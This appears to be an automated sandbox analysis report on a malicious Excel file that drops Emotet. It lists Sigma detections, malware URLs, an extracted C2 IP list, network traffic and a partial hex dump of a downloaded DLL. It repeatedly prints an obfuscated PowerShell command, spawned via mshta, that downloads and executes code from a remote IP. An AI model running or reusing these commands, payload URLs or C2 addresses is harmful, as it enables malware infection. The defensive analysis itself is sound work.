$c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2564, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2908

Sigma detected: Suspicious MSHTA Process Patterns

Source: Process started

Author: Florian Roth: Data: Command: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2696, ProcessCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2564

Sigma detected: Microsoft Office Product Spawning Windows Shell

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2592, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2696

Sigma detected: Suspicious PowerShell Command Line

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2564, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2908

Sigma detected: Mshta Spawning Windows Shell

Source: Process started

Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2564, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2908

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2564, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2908

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://maxtdeveloper.com/okw9yx/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f	Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/	Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png	Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com	Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3	Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/	Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/	Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/	Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont	Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html	Avira URL Cloud: Label: malware

Found malware configuration

Source: 10.2.rundll32.exe.3150000.13.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Multi AV Scanner detection for submitted file

Source: 1162545482187818.xls	Virustotal: Detection: 12%			Perma Link
Source: 1162545482187818.xls	ReversingLabs: Detection: 18%

Multi AV Scanner detection for domain / URL

Source: hostfeeling.com	Virustotal: Detection: 10%			Perma Link
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	Virustotal: Detection: 12%			Perma Link

Machine Learning detection for dropped file

Source: C:\ProgramData\JooSee.dll

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677749901.0000000002D37000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,		9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,		11_2_10021854

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

Source: global traffic

DNS query: name: hostfeeling.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 160.16.102.168:80
Source: Malware configuration extractor	IPs: 131.100.24.231:80
Source: Malware configuration extractor	IPs: 200.17.134.35:7080
Source: Malware configuration extractor	IPs: 207.38.84.195:8080
Source: Malware configuration extractor	IPs: 212.237.56.116:7080
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 104.251.214.46:8080
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 192.254.71.210:443
Source: Malware configuration extractor	IPs: 46.55.222.11:443
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 104.168.155.129:8080
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 159.8.59.82:8080
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 41.76.108.46:8080
Source: Malware configuration extractor	IPs: 203.114.109.124:443
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 209.59.138.75:7080
Source: Malware configuration extractor	IPs: 185.157.82.211:8080
Source: Malware configuration extractor	IPs: 164.68.99.3:8080
Source: Malware configuration extractor	IPs: 162.214.50.39:7080
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 178.63.25.185:443
Source: Malware configuration extractor	IPs: 51.15.4.22:443
Source: Malware configuration extractor	IPs: 81.0.236.90:443
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 45.176.232.124:443
Source: Malware configuration extractor	IPs: 162.243.175.63:443
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 129.232.188.93:443
Source: Malware configuration extractor	IPs: 173.214.173.220:8080
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 51.38.71.0:443
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 212.24.98.99:8080
Source: Malware configuration extractor	IPs: 159.89.230.105:443
Source: Malware configuration extractor	IPs: 79.172.212.216:8080
Source: Malware configuration extractor	IPs: 212.237.5.209:443

Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:37:47 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f4541b7e0f9=1643402267; expires=Fri, 28-Jan-2022 20:38:47 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:37:47 GMTExpires: Fri, 28 Jan 2022 20:37:47 GMTContent-Disposition: attachment; filename="sAJSMp.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 